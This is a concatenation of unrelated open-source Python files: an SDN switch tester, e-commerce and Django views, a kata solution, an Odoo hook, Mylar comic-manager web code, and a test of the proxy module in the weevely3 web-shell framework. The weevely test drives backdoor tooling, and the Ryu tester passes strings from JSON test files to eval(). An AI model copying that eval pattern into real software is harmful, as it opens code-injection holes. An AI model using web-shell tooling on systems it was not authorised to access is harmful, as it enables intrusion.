self.description = test_json
else:
self.tests.append(Test(test_json))
except (ValueError, TypeError) as e:
result = (TEST_FILE_ERROR %
{'file': path, 'detail': e.message})
self.logger.warning(result)
class Test(stringify.StringifyMixin):
def __init__(self, test_json):
super(Test, self).__init__()
(self.description,
self.prerequisite,
self.tests) = self._parse_test(test_json)
def _parse_test(self, buf):
def __test_pkt_from_json(test):
data = eval('/'.join(test))
data.serialize()
return str(data.data)
# parse 'description'
description = buf.get(KEY_DESC)
# parse 'prerequisite'
prerequisite = []
if not KEY_PREREQ in buf:
raise ValueError('a test requires a "%s" block' % KEY_PREREQ)
for flow in buf[KEY_PREREQ]:
cls = getattr(ofproto_v1_3_parser, KEY_FLOW)
msg = cls.from_jsondict(flow[KEY_FLOW], datapath=DummyDatapath())
msg.version = ofproto_v1_3.OFP_VERSION
msg.msg_type = msg.cls_msg_type
msg.xid = 0
prerequisite.append(msg)
# parse 'tests'
tests = []
if not KEY_TESTS in buf:
raise ValueError('a test requires a "%s" block.' % KEY_TESTS)
for test in buf[KEY_TESTS]:
if len(test) != 2:
raise ValueError(
'"%s" block requires "%s" field and one of "%s" or "%s"'
' or "%s" field.' % (KEY_TESTS, KEY_INGRESS, KEY_EGRESS,
KEY_PKT_IN, KEY_TBL_MISS))
test_pkt = {}
# parse 'ingress'
if not KEY_INGRESS in test:
raise ValueError('a test requires "%s" field.' % KEY_INGRESS)
test_pkt[KEY_INGRESS] = __test_pkt_from_json(test[KEY_INGRESS])
# parse 'egress' or 'PACKET_IN' or 'table-miss'
if KEY_EGRESS in test:
test_pkt[KEY_EGRESS] = __test_pkt_from_json(test[KEY_EGRESS])
elif KEY_PKT_IN in test:
test_pkt[KEY_PKT_IN] = __test_pkt_from_json(test[KEY_PKT_IN])
elif KEY_TBL_MISS in test:
test_pkt[KEY_TBL_MISS] = test[KEY_TBL_MISS]
tests.append(test_pkt)
return (description, prerequisite, tests)
class DummyDatapath(object):
def __init__(self):
self.ofproto = ofproto_v1_3
self.ofproto_parser = ofproto_v1_3_parser
| Rashminadig/SDN | ryu/tests/switch/tester.py | Python | apache-2.0 | 34,887 |
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import django.views.generic
from django.http import HttpResponseRedirect
from django.views.generic import View
from shuup.core.models import Order, ProductMode
from shuup.front.views.dashboard import DashboardViewMixin
from shuup.utils.django_compat import reverse
class OrderViewMixin(object):
model = Order
def get_queryset(self):
qs = super(OrderViewMixin, self).get_queryset()
return qs.filter(customer=self.request.customer)
class OrderListView(DashboardViewMixin, OrderViewMixin, django.views.generic.ListView):
template_name = "shuup/personal_order_history/order_list.jinja"
context_object_name = "orders"
class OrderDetailView(DashboardViewMixin, OrderViewMixin, django.views.generic.DetailView):
template_name = "shuup/personal_order_history/order_detail.jinja"
context_object_name = "order"
def get_context_data(self, **kwargs):
context = super(OrderDetailView, self).get_context_data(**kwargs)
reorderable_lines = _get_reorderable_lines(context["order"])
context["order_is_reorderable"] = reorderable_lines.exists()
return context
class ReorderView(View):
def get(self, request, *args, **kwargs):
try:
order = Order.objects.get(customer=request.customer, pk=kwargs["pk"])
except Order.DoesNotExist:
return HttpResponseRedirect(reverse("shuup:show-order", kwargs=kwargs))
for line in _get_reorderable_lines(order):
request.basket.add_product(
supplier=line.supplier, shop=request.shop, product=line.product, quantity=line.quantity
)
return HttpResponseRedirect(reverse("shuup:basket"))
def _get_reorderable_lines(order):
"""
Get re-orderable lines of an order.
This is all product lines except:
* child lines, because otherwise package contents are added twice.
* subscriptions, because those don't use normal checkout flow.
"""
return order.lines.products().exclude(parent_line__isnull=False).exclude(product__mode=ProductMode.SUBSCRIPTION)
| shoopio/shoop | shuup/front/apps/personal_order_history/views.py | Python | agpl-3.0 | 2,304 |
def duplicate_sandwich(arr):
seen = set()
for word in arr:
if word in seen:
double = word
break
seen.add(word)
i1 = -1
i2 = -1
for i,word in enumerate(arr):
if word == double:
if i1 < 0:
i1 = i
else:
i2 = i
break
return arr[i1+1:i2]
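# A short usage sketch (not part of the original kata solution): the function returns
# the slice strictly between the two occurrences of the duplicated value, e.g.
#   duplicate_sandwich(['ham', 'and', 'egg', 'ham'])  ->  ['and', 'egg']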
| SelvorWhim/competitive | Codewars/DuplicateSandwich.py | Python | unlicense | 377 |
from tests.base_test import BaseTest
from tests import config
from core.sessions import SessionURL
from core import modules
from core import messages
import subprocess
import logging
import tempfile
import os
import re
import time
import json
import socket
class Proxy(BaseTest):
def setUp(self):
session = SessionURL(self.url, self.password, volatile = True)
modules.load_modules(session)
self.url = 'http://httpbin-inst'
modules.loaded['net_proxy'].run_argv([ '-lhost', '0.0.0.0', '-lport', '8080' ])
def run_argv(self, arguments, unquoted_args = ''):
arguments += [ '--proxy', '127.0.0.1:8080' ]
result = subprocess.check_output(
'curl -s %s "%s"' % (unquoted_args, '" "'.join(arguments)),
shell=True).strip()
return result
def _json_result(self, args, unquoted_args = ''):
result = self.run_argv(args, unquoted_args).decode('utf-8')
return result if not result else json.loads(result)
def _headers_result(self, args):
return self.run_argv(args, unquoted_args = '-sSL -D - -o /dev/null').splitlines()
def test_all(self):
# HTTPS GET with no SSL check
self.assertIn(
b'Google',
self.run_argv([ 'https://www.google.com', '-k' ])
)
# HTTPS GET with cacert
self.assertIn(
b'Google',
self.run_argv([ 'https://www.google.com' ], unquoted_args='--cacert ~/.weevely/certs/ca.crt')
)
# HTTPS without cacert
try:
self.run_argv([ 'https://www.google.com' ])
except subprocess.CalledProcessError:
pass
else:
self.fail("No error")
# Simple GET
url = self.url + '/get'
self.assertEqual(
url,
self._json_result([ url ])['url']
)
# PUT request
url = self.url + '/put'
self.assertEqual(
url,
self._json_result([ url, '-X', 'PUT' ])['url']
)
        # OPTIONS request - httpbin has nothing specific for testing OPTIONS,
        # but it is still an accepted verb that returns 200 OK
url = self.url + '/anything'
self.assertEqual(
b'200 OK',
self._headers_result([ url, '-X', 'PUT' ])[0][-6:]
)
# Add header
url = self.url + '/headers'
self.assertEqual(
'value',
self._json_result([ url, '-H', 'X-Arbitrary-Header: value' ])['headers']['X-Arbitrary-Header']
)
# Add cookie
url = self.url + '/cookies'
self.assertEqual(
{'C1': 'bogus', 'C2' : 'bogus2'},
self._json_result([ url, '-b', 'C1=bogus;C2=bogus2' ])['cookies']
)
# POST request with data
url = self.url + '/post'
result = self._json_result([ url, '--data', 'f1=data1&f2=data2' ])
self.assertEqual(
{ 'f1': 'data1', 'f2': 'data2' },
result['form']
)
self.assertEqual(
"application/x-www-form-urlencoded",
result['headers']['Content-Type']
)
# POST request with binary string
url = self.url + '/post'
result = self._json_result([ url ], unquoted_args="--data FIELD=$(env echo -ne 'D\\x41\\x54A\\x00B')")
self.assertEqual(
{ 'FIELD': 'DATAB' },
result['form']
)
# Simple GET with parameters
url = self.url + '/get?f1=data1&f2=data2'
self.assertEqual(
{ 'f1': 'data1', 'f2': 'data2' },
self._json_result([ url ])['args']
)
# HTTPS GET to test SSL checks are disabled
google_ip = socket.gethostbyname('www.google.com')
self.assertIn(
b'google',
self.run_argv([ 'https://' + google_ip, "-k" ])
)
# UNREACHABLE
# This is not true depending on the used ISP, commenting it out
#self.assertIn('Message: Bad Gateway.', self.run_argv([ 'http://co.uk:0' ]))
# FILTERED
self.assertIn(b'Message: Bad Gateway.', self.run_argv([ 'http://www.google.com:9999', '--connect-timeout', '1' ]))
# CLOSED
self.assertIn(b'Message: Bad Gateway.', self.run_argv([ 'http://localhost:9999', '--connect-timeout', '1' ]))
| epinna/weevely3 | tests/test_net_proxy.py | Python | gpl-3.0 | 4,397 |
# -*- coding: utf-8 -*-
"""Tests for safetymomentum views."""
from django.test import TestCase
class TestHome(TestCase):
"""Test the home page."""
def test_get_home(self):
"""Test GET /."""
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
| jwhitlock/safetymomentum | safetymomentum/tests/test_views.py | Python | mpl-2.0 | 302 |
# -*- coding: utf-8 -*-
# © 2017 Savoir-faire Linux
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
import logging
from odoo import api, SUPERUSER_ID
logger = logging.getLogger(__name__)
def update_partners_indexed_name(cr, registry):
env = api.Environment(cr, SUPERUSER_ID, {})
logger.info('Updating indexed name for all partners')
partners = env['res.partner'].search([])
partners._update_indexed_name()
| savoirfairelinux/partner-addons | partner_duplicate_mgmt/init_hook.py | Python | lgpl-3.0 | 443 |
# This file is part of Mylar.
# -*- coding: utf-8 -*-
#
# Mylar is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Mylar is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Mylar. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import os
import io
import sys
import cherrypy
import requests
import datetime
from datetime import timedelta, date
import re
import json
import copy
import ntpath
from mako.template import Template
from mako.lookup import TemplateLookup
from mako import exceptions
import time
import threading
import csv
import platform
import urllib
import shutil
import mylar
from mylar import logger, db, importer, mb, search, filechecker, helpers, updater, parseit, weeklypull, PostProcessor, librarysync, moveit, Failed, readinglist, notifiers, sabparse, config
from mylar.auth import AuthController, require
import simplejson as simplejson
from operator import itemgetter
def serve_template(templatename, **kwargs):
interface_dir = os.path.join(str(mylar.PROG_DIR), 'data/interfaces/')
template_dir = os.path.join(str(interface_dir), mylar.CONFIG.INTERFACE)
_hplookup = TemplateLookup(directories=[template_dir])
try:
template = _hplookup.get_template(templatename)
return template.render(http_root=mylar.CONFIG.HTTP_ROOT, **kwargs)
except:
return exceptions.html_error_template().render()
class WebInterface(object):
auth = AuthController()
def index(self):
if mylar.SAFESTART:
raise cherrypy.HTTPRedirect("manageComics")
else:
raise cherrypy.HTTPRedirect("home")
index.exposed=True
def home(self):
comics = helpers.havetotals()
return serve_template(templatename="index.html", title="Home", comics=comics, alphaindex=mylar.CONFIG.ALPHAINDEX)
home.exposed = True
def comicDetails(self, ComicID):
myDB = db.DBConnection()
comic = myDB.selectone('SELECT * FROM comics WHERE ComicID=?', [ComicID]).fetchone()
if comic is None:
raise cherrypy.HTTPRedirect("home")
totalissues = comic['Total']
haveissues = comic['Have']
if not haveissues:
haveissues = 0
try:
percent = (haveissues *100.0) /totalissues
if percent > 100:
percent = 101
except (ZeroDivisionError, TypeError):
percent = 0
totalissues = '?'
#let's cheat. :)
#comicskip = myDB.select('SELECT * from comics order by ComicSortName COLLATE NOCASE')
skipno = len(mylar.COMICSORT['SortOrder'])
lastno = mylar.COMICSORT['LastOrderNo']
lastid = mylar.COMICSORT['LastOrderID']
series = {}
if skipno == 0:
#it's a blank db, let's just null the values and go.
series['Current'] = None
series['Previous'] = None
series['Next'] = None
i = 0
while (i < skipno):
cskip = mylar.COMICSORT['SortOrder'][i]
if cskip['ComicID'] == ComicID:
cursortnum = cskip['ComicOrder']
series['Current'] = cskip['ComicID']
if cursortnum == 0:
# if first record, set the Previous record to the LAST record.
previous = lastid
else:
previous = mylar.COMICSORT['SortOrder'][i -1]['ComicID']
# if last record, set the Next record to the FIRST record.
if cursortnum == lastno:
next = mylar.COMICSORT['SortOrder'][0]['ComicID']
else:
next = mylar.COMICSORT['SortOrder'][i +1]['ComicID']
series['Previous'] = previous
series['Next'] = next
break
i+=1
issues = myDB.select('SELECT * FROM issues WHERE ComicID=? order by Int_IssueNumber DESC', [ComicID])
isCounts = {}
isCounts[1] = 0 #1 skipped
isCounts[2] = 0 #2 wanted
isCounts[3] = 0 #3 archived
isCounts[4] = 0 #4 downloaded
isCounts[5] = 0 #5 ignored
isCounts[6] = 0 #6 failed
isCounts[7] = 0 #7 snatched
#isCounts[8] = 0 #8 read
for curResult in issues:
baseissues = {'skipped': 1, 'wanted': 2, 'archived': 3, 'downloaded': 4, 'ignored': 5, 'failed': 6, 'snatched': 7}
for seas in baseissues:
if curResult['Status'] is None:
continue
else:
if seas in curResult['Status'].lower():
sconv = baseissues[seas]
isCounts[sconv]+=1
continue
isCounts = {
"Skipped": str(isCounts[1]),
"Wanted": str(isCounts[2]),
"Archived": str(isCounts[3]),
"Downloaded": str(isCounts[4]),
"Ignored": str(isCounts[5]),
"Failed": str(isCounts[6]),
"Snatched": str(isCounts[7])
}
usethefuzzy = comic['UseFuzzy']
allowpacks = comic['AllowPacks']
skipped2wanted = "0"
if usethefuzzy is None:
usethefuzzy = "0"
force_continuing = comic['ForceContinuing']
if force_continuing is None:
force_continuing = 0
if mylar.CONFIG.DELETE_REMOVE_DIR is None:
mylar.CONFIG.DELETE_REMOVE_DIR = 0
if allowpacks is None:
allowpacks = "0"
if all([comic['Corrected_SeriesYear'] is not None, comic['Corrected_SeriesYear'] != '', comic['Corrected_SeriesYear'] != 'None']):
if comic['Corrected_SeriesYear'] != comic['ComicYear']:
comic['ComicYear'] = comic['Corrected_SeriesYear']
# imagetopull = myDB.selectone('SELECT issueid from issues where ComicID=? AND Int_IssueNumber=?', [comic['ComicID'], helpers.issuedigits(comic['LatestIssue'])]).fetchone()
# imageurl = mylar.cv.getComic(comic['ComicID'], 'image', issueid=imagetopull[0])
# helpers.getImage(comic['ComicID'], imageurl)
if comic['ComicImage'] is None:
comicImage = 'cache/' + str(ComicID) + '.jpg'
else:
comicImage = comic['ComicImage']
comicpublisher = helpers.publisherImages(comic['ComicPublisher'])
if comic['Collects'] is not None:
issues_list = json.loads(comic['Collects'])
else:
issues_list = None
#logger.info('issues_list: %s' % issues_list)
if comic['Corrected_Type'] == 'TPB':
force_type = 1
elif comic['Corrected_Type'] == 'Print':
force_type = 2
else:
force_type = 0
comicConfig = {
"fuzzy_year0": helpers.radio(int(usethefuzzy), 0),
"fuzzy_year1": helpers.radio(int(usethefuzzy), 1),
"fuzzy_year2": helpers.radio(int(usethefuzzy), 2),
"skipped2wanted": helpers.checked(skipped2wanted),
"force_continuing": helpers.checked(force_continuing),
"force_type": helpers.checked(force_type),
"delete_dir": helpers.checked(mylar.CONFIG.DELETE_REMOVE_DIR),
"allow_packs": helpers.checked(int(allowpacks)),
"corrected_seriesyear": comic['ComicYear'],
"torrentid_32p": comic['TorrentID_32P'],
"totalissues": totalissues,
"haveissues": haveissues,
"percent": percent,
"publisher_image": comicpublisher['publisher_image'],
"publisher_image_alt": comicpublisher['publisher_image_alt'],
"publisher_imageH": comicpublisher['publisher_imageH'],
"publisher_imageW": comicpublisher['publisher_imageW'],
"issue_list": issues_list,
"ComicImage": comicImage + '?' + datetime.datetime.now().strftime('%y-%m-%d %H:%M:%S')
}
if mylar.CONFIG.ANNUALS_ON:
annuals = myDB.select("SELECT * FROM annuals WHERE ComicID=? ORDER BY ComicID, Int_IssueNumber DESC", [ComicID])
#we need to load in the annual['ReleaseComicName'] and annual['ReleaseComicID']
            #then group by ReleaseComicID, in an attempt to create separate tables for each different annual series.
#this should allow for annuals, specials, one-shots, etc all to be included if desired.
acnt = 0
aName = []
annuals_list = []
annualinfo = {}
prevcomicid = None
for ann in annuals:
if not any(d.get('annualComicID', None) == str(ann['ReleaseComicID']) for d in aName):
aName.append({"annualComicName": ann['ReleaseComicName'],
"annualComicID": ann['ReleaseComicID']})
issuename = ann['IssueName']
if ann['IssueName'] is not None:
if len(ann['IssueName']) > 75:
issuename = '%s...' % ann['IssueName'][:75]
annuals_list.append({"Issue_Number": ann['Issue_Number'],
"Int_IssueNumber": ann['Int_IssueNumber'],
"IssueName": issuename,
"IssueDate": ann['IssueDate'],
"DigitalDate": ann['DigitalDate'],
"Status": ann['Status'],
"Location": ann['Location'],
"ComicID": ann['ComicID'],
"IssueID": ann['IssueID'],
"ReleaseComicID": ann['ReleaseComicID'],
"ComicName": ann['ComicName'],
"ComicSize": ann['ComicSize'],
"ReleaseComicName": ann['ReleaseComicName'],
"PrevComicID": prevcomicid})
prevcomicid = ann['ReleaseComicID']
acnt+=1
annualinfo = aName
#annualinfo['count'] = acnt
else:
annuals_list = None
aName = None
return serve_template(templatename="comicdetails.html", title=comic['ComicName'], comic=comic, issues=issues, comicConfig=comicConfig, isCounts=isCounts, series=series, annuals=annuals_list, annualinfo=aName)
comicDetails.exposed = True
def searchit(self, name, issue=None, mode=None, type=None, serinfo=None):
if type is None: type = 'comic' # let's default this to comic search only for the time being (will add story arc, characters, etc later)
else: logger.fdebug(str(type) + " mode enabled.")
#mode dictates type of search:
# --series ... search for comicname displaying all results
# --pullseries ... search for comicname displaying a limited # of results based on issue
# --want ... individual comics
if mode is None: mode = 'series'
if len(name) == 0:
raise cherrypy.HTTPRedirect("home")
if type == 'comic' and mode == 'pullseries':
if issue == 0:
#if it's an issue 0, CV doesn't have any data populated yet - so bump it up one to at least get the current results.
issue = 1
try:
searchresults = mb.findComic(name, mode, issue=issue)
except TypeError:
logger.error('Unable to perform required pull-list search for : [name: ' + name + '][issue: ' + issue + '][mode: ' + mode + ']')
return
elif type == 'comic' and mode == 'series':
if name.startswith('4050-'):
mismatch = "no"
comicid = re.sub('4050-', '', name)
logger.info('Attempting to add directly by ComicVineID: ' + str(comicid) + '. I sure hope you know what you are doing.')
threading.Thread(target=importer.addComictoDB, args=[comicid, mismatch, None]).start()
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
try:
searchresults = mb.findComic(name, mode, issue=None)
except TypeError:
logger.error('Unable to perform required search for : [name: ' + name + '][mode: ' + mode + ']')
return
elif type == 'comic' and mode == 'want':
try:
searchresults = mb.findComic(name, mode, issue)
except TypeError:
logger.error('Unable to perform required one-off pull-list search for : [name: ' + name + '][issue: ' + issue + '][mode: ' + mode + ']')
return
elif type == 'story_arc':
try:
searchresults = mb.findComic(name, mode=None, issue=None, type='story_arc')
except TypeError:
logger.error('Unable to perform required story-arc search for : [arc: ' + name + '][mode: ' + mode + ']')
return
try:
searchresults = sorted(searchresults, key=itemgetter('comicyear', 'issues'), reverse=True)
except Exception as e:
logger.error('Unable to retrieve results from ComicVine: %s' % e)
if mylar.CONFIG.COMICVINE_API is None:
logger.error('You NEED to set a ComicVine API key prior to adding anything. It\'s Free - Go get one!')
return
return serve_template(templatename="searchresults.html", title='Search Results for: "' + name + '"', searchresults=searchresults, type=type, imported=None, ogcname=None, name=name, serinfo=serinfo)
searchit.exposed = True
def addComic(self, comicid, comicname=None, comicyear=None, comicimage=None, comicissues=None, comicpublisher=None, imported=None, ogcname=None, serinfo=None):
myDB = db.DBConnection()
if imported == "confirm":
# if it's coming from the importer and it's just for confirmation, record the right selection and break.
# if it's 'confirmed' coming in as the value for imported
# the ogcname will be the original comicid that is either correct/incorrect (doesn't matter which)
#confirmedid is the selected series (comicid) with the letter C at the beginning to denote Confirmed.
# then sql the original comicid which will hit on all the results for the given series.
# iterate through, and overwrite the existing watchmatch with the new chosen 'C' + comicid value
confirmedid = "C" + str(comicid)
confirms = myDB.select("SELECT * FROM importresults WHERE WatchMatch=?", [ogcname])
if confirms is None:
                logger.error("There are no results that match...this is an ERROR.")
else:
for confirm in confirms:
controlValue = {"impID": confirm['impID']}
newValue = {"WatchMatch": str(confirmedid)}
myDB.upsert("importresults", newValue, controlValue)
self.importResults()
return
elif imported == 'futurecheck':
print 'serinfo:' + str(serinfo)
logger.info('selected comicid of : ' + str(comicid) + ' [ ' + comicname + ' (' + str(comicyear) + ') ]')
ser = []
ser.append({"comicname": comicname,
"comicyear": comicyear,
"comicissues": comicissues,
"comicpublisher": comicpublisher,
"IssueDate": serinfo[0]['IssueDate'],
"IssueNumber": serinfo[0]['IssueNumber']})
weeklypull.future_check_add(comicid, ser)
sresults = []
cresults = []
mismatch = "no"
#print ("comicid: " + str(comicid))
#print ("comicname: " + str(comicname))
#print ("comicyear: " + str(comicyear))
#print ("comicissues: " + str(comicissues))
#print ("comicimage: " + str(comicimage))
if not mylar.CONFIG.CV_ONLY:
#here we test for exception matches (ie. comics spanning more than one volume, known mismatches, etc).
CV_EXcomicid = myDB.selectone("SELECT * from exceptions WHERE ComicID=?", [comicid]).fetchone()
if CV_EXcomicid is None: # pass #
gcdinfo=parseit.GCDScraper(comicname, comicyear, comicissues, comicid, quickmatch="yes")
if gcdinfo == "No Match":
#when it no matches, the image will always be blank...let's fix it.
cvdata = mylar.cv.getComic(comicid, 'comic')
comicimage = cvdata['ComicImage']
updater.no_searchresults(comicid)
nomatch = "true"
u_comicname = comicname.encode('utf-8').strip()
logger.info("I couldn't find an exact match for " + u_comicname + " (" + str(comicyear) + ") - gathering data for Error-Checking screen (this could take a minute)...")
i = 0
loopie, cnt = parseit.ComChk(comicname, comicyear, comicpublisher, comicissues, comicid)
logger.info("total count : " + str(cnt))
while (i < cnt):
try:
stoopie = loopie['comchkchoice'][i]
except (IndexError, TypeError):
break
cresults.append({
'ComicID': stoopie['ComicID'],
'ComicName': stoopie['ComicName'].decode('utf-8', 'replace'),
'ComicYear': stoopie['ComicYear'],
'ComicIssues': stoopie['ComicIssues'],
'ComicURL': stoopie['ComicURL'],
'ComicPublisher': stoopie['ComicPublisher'].decode('utf-8', 'replace'),
'GCDID': stoopie['GCDID']
})
i+=1
if imported != 'None':
#if it's from an import and it has to go through the UEC, return the values
#to the calling function and have that return the template
return cresults
else:
return serve_template(templatename="searchfix.html", title="Error Check", comicname=comicname, comicid=comicid, comicyear=comicyear, comicimage=comicimage, comicissues=comicissues, cresults=cresults, imported=None, ogcname=None)
else:
nomatch = "false"
logger.info(u"Quick match success..continuing.")
else:
if CV_EXcomicid['variloop'] == '99':
logger.info(u"mismatched name...autocorrecting to correct GID and auto-adding.")
mismatch = "yes"
if CV_EXcomicid['NewComicID'] == 'none':
logger.info(u"multi-volume series detected")
testspx = CV_EXcomicid['GComicID'].split('/')
for exc in testspx:
fakeit = parseit.GCDAdd(testspx)
howmany = int(CV_EXcomicid['variloop'])
t = 0
while (t <= howmany):
try:
sres = fakeit['serieschoice'][t]
except IndexError:
break
sresults.append({
'ComicID': sres['ComicID'],
'ComicName': sres['ComicName'],
'ComicYear': sres['ComicYear'],
'ComicIssues': sres['ComicIssues'],
'ComicPublisher': sres['ComicPublisher'],
'ComicCover': sres['ComicCover']
})
t+=1
#searchfix(-1).html is for misnamed comics and wrong years.
#searchfix-2.html is for comics that span multiple volumes.
return serve_template(templatename="searchfix-2.html", title="In-Depth Results", sresults=sresults)
#print ("imported is: " + str(imported))
threading.Thread(target=importer.addComictoDB, args=[comicid, mismatch, None, imported, ogcname]).start()
time.sleep(5) #wait 5s so the db can be populated enough to display the page - otherwise will return to home page if not enough info is loaded.
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
addComic.exposed = True
def addbyid(self, comicid, calledby=None, imported=None, ogcname=None, nothread=False):
mismatch = "no"
logger.info('Attempting to add directly by ComicVineID: ' + str(comicid))
if comicid.startswith('4050-'): comicid = re.sub('4050-', '', comicid)
if nothread is False:
threading.Thread(target=importer.addComictoDB, args=[comicid, mismatch, None, imported, ogcname]).start()
else:
return importer.addComictoDB(comicid, mismatch, None, imported, ogcname)
if calledby == True or calledby == 'True':
return
elif calledby == 'web-import':
raise cherrypy.HTTPRedirect("importResults")
else:
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
addbyid.exposed = True
def addStoryArc_thread(self, **kwargs):
threading.Thread(target=self.addStoryArc, kwargs=kwargs).start()
addStoryArc_thread.exposed = True
def addStoryArc(self, arcid, arcrefresh=False, cvarcid=None, arclist=None, storyarcname=None, storyarcyear=None, storyarcpublisher=None, storyarcissues=None, desc=None, image=None):
# used when a choice is selected to 'add story arc' via the searchresults screen (via the story arc search).
# arclist contains ALL the issueid's in sequence, along with the issue titles.
# call the function within cv.py to grab all the issueid's and return all the issue data
module = '[STORY ARC]'
myDB = db.DBConnection()
#check if it already exists.
if cvarcid is None:
arc_chk = myDB.select('SELECT * FROM storyarcs WHERE StoryArcID=?', [arcid])
else:
arc_chk = myDB.select('SELECT * FROM storyarcs WHERE CV_ArcID=?', [cvarcid])
if arc_chk is None:
if arcrefresh:
logger.warn(module + ' Unable to retrieve Story Arc ComicVine ID from the db. Unable to refresh Story Arc at this time. You probably have to delete/readd the story arc this one time for Refreshing to work properly.')
return
else:
logger.fdebug(module + ' No match in db based on ComicVine ID. Making sure and checking against Story Arc Name.')
arc_chk = myDB.select('SELECT * FROM storyarcs WHERE StoryArc=?', [storyarcname])
if arc_chk is None:
logger.warn(module + ' ' + storyarcname + ' already exists on your Story Arc Watchlist!')
raise cherrypy.HTTPRedirect("readlist")
else:
if arcrefresh: #cvarcid must be present here as well..
logger.info(module + '[' + str(arcid) + '] Successfully found Story Arc ComicVine ID [4045-' + str(cvarcid) + '] within db. Preparing to refresh Story Arc.')
# we need to store the existing arc values that are in the db, so we don't create duplicate entries or mess up items.
iss_arcids = []
for issarc in arc_chk:
iss_arcids.append({"IssueArcID": issarc['IssueArcID'],
"IssueID": issarc['IssueID'],
"Manual": issarc['Manual']})
arcinfo = mb.storyarcinfo(cvarcid)
if len(arcinfo) > 1:
arclist = arcinfo['arclist']
else:
logger.warn(module + ' Unable to retrieve issue details at this time. Something is probably wrong.')
return
# else:
# logger.warn(module + ' ' + storyarcname + ' already exists on your Story Arc Watchlist.')
# raise cherrypy.HTTPRedirect("readlist")
#check to makes sure storyarcs dir is present in cache in order to save the images...
if not os.path.isdir(os.path.join(mylar.CONFIG.CACHE_DIR, 'storyarcs')):
checkdirectory = filechecker.validateAndCreateDirectory(os.path.join(mylar.CONFIG.CACHE_DIR, 'storyarcs'), True)
if not checkdirectory:
logger.warn('Error trying to validate/create cache storyarc directory. Aborting this process at this time.')
return
coverfile = os.path.join(mylar.CONFIG.CACHE_DIR, 'storyarcs', str(cvarcid) + "-banner.jpg")
if mylar.CONFIG.CVAPI_RATE is None or mylar.CONFIG.CVAPI_RATE < 2:
time.sleep(2)
else:
time.sleep(mylar.CONFIG.CVAPI_RATE)
logger.info('Attempting to retrieve the comic image for series')
if arcrefresh:
imageurl = arcinfo['comicimage']
else:
imageurl = image
logger.info('imageurl: %s' % imageurl)
try:
r = requests.get(imageurl, params=None, stream=True, verify=mylar.CONFIG.CV_VERIFY, headers=mylar.CV_HEADERS)
except Exception, e:
logger.warn('Unable to download image from CV URL link - possibly no arc picture is present: %s' % imageurl)
else:
logger.fdebug('comic image retrieval status code: %s' % r.status_code)
if str(r.status_code) != '200':
logger.warn('Unable to download image from CV URL link: %s [Status Code returned: %s]' % (imageurl, r.status_code))
else:
                if r.headers.get('Content-Encoding') == 'gzip':
                    #requests transparently decompresses gzip-encoded responses, so the image content can be written out as-is.
                    logger.fdebug('gzip-encoded response received for the arc image - writing the decompressed content.')
                with open(coverfile, 'wb') as f:
                    for chunk in r.iter_content(chunk_size=1024):
                        if chunk: # filter out keep-alive new chunks
                            f.write(chunk)
                            f.flush()
arc_results = mylar.cv.getComic(comicid=None, type='issue', arcid=arcid, arclist=arclist)
logger.fdebug('%s Arcresults: %s' % (module, arc_results))
logger.fdebug('%s Arclist: %s' % (module, arclist))
if len(arc_results) > 0:
import random
issuedata = []
if storyarcissues is None:
storyarcissues = len(arc_results['issuechoice'])
if arcid is None:
storyarcid = str(random.randint(1000,9999)) + str(storyarcissues)
else:
storyarcid = arcid
n = 0
cidlist = ''
iscnt = int(storyarcissues)
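            #walk every issue returned for the arc, building an issuedata record (ids, dates, reading order) for each entry.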
while (n <= iscnt):
try:
arcval = arc_results['issuechoice'][n]
except IndexError:
break
comicname = arcval['ComicName']
st_d = mylar.filechecker.FileChecker(watchcomic=comicname)
st_dyninfo = st_d.dynamic_replace(comicname)
dynamic_name = re.sub('[\|\s]','', st_dyninfo['mod_seriesname'].lower()).strip()
issname = arcval['Issue_Name']
issid = str(arcval['IssueID'])
comicid = str(arcval['ComicID'])
#--- this needs to get changed so comicid within a comicid doesn't exist (ie. 3092 is IN 33092)
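                #cidlist is a pipe-delimited list of unique ComicIDs so the series year/publisher lookup further down only queries each series once.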
cid_count = cidlist.count(comicid) +1
a_end = 0
i = 0
while i < cid_count:
a = cidlist.find(comicid, a_end)
a_end = cidlist.find('|',a)
if a_end == -1: a_end = len(cidlist)
a_length = cidlist[a:a_end-1]
if a == -1 and len(a_length) != len(comicid):
if n == 0:
cidlist += str(comicid)
else:
cidlist += '|' + str(comicid)
break
i+=1
#don't recreate the st_issueid if it's a refresh and the issueid already exists (will create duplicates otherwise)
st_issueid = None
manual_mod = None
if arcrefresh:
for aid in iss_arcids:
if aid['IssueID'] == issid:
st_issueid = aid['IssueArcID']
manual_mod = aid['Manual']
break
if st_issueid is None:
st_issueid = str(storyarcid) + "_" + str(random.randint(1000,9999))
issnum = arcval['Issue_Number']
issdate = str(arcval['Issue_Date'])
digitaldate = str(arcval['Digital_Date'])
storedate = str(arcval['Store_Date'])
int_issnum = helpers.issuedigits(issnum)
#verify the reading order if present.
findorder = arclist.find(issid)
if findorder != -1:
ros = arclist.find('|',findorder+1)
if ros != -1:
roslen = arclist[findorder:ros]
else:
                        #last entry doesn't have a trailing '|'
roslen = arclist[findorder:]
rosre = re.sub(issid,'', roslen)
readingorder = int(re.sub('[\,\|]','', rosre).strip())
else:
readingorder = 0
logger.fdebug('[%s] issueid: %s - findorder#: %s' % (readingorder, issid, findorder))
issuedata.append({"ComicID": comicid,
"IssueID": issid,
"StoryArcID": storyarcid,
"IssueArcID": st_issueid,
"ComicName": comicname,
"DynamicName": dynamic_name,
"IssueName": issname,
"Issue_Number": issnum,
"IssueDate": issdate,
"ReleaseDate": storedate,
"DigitalDate": digitaldate,
"ReadingOrder": readingorder, #n +1,
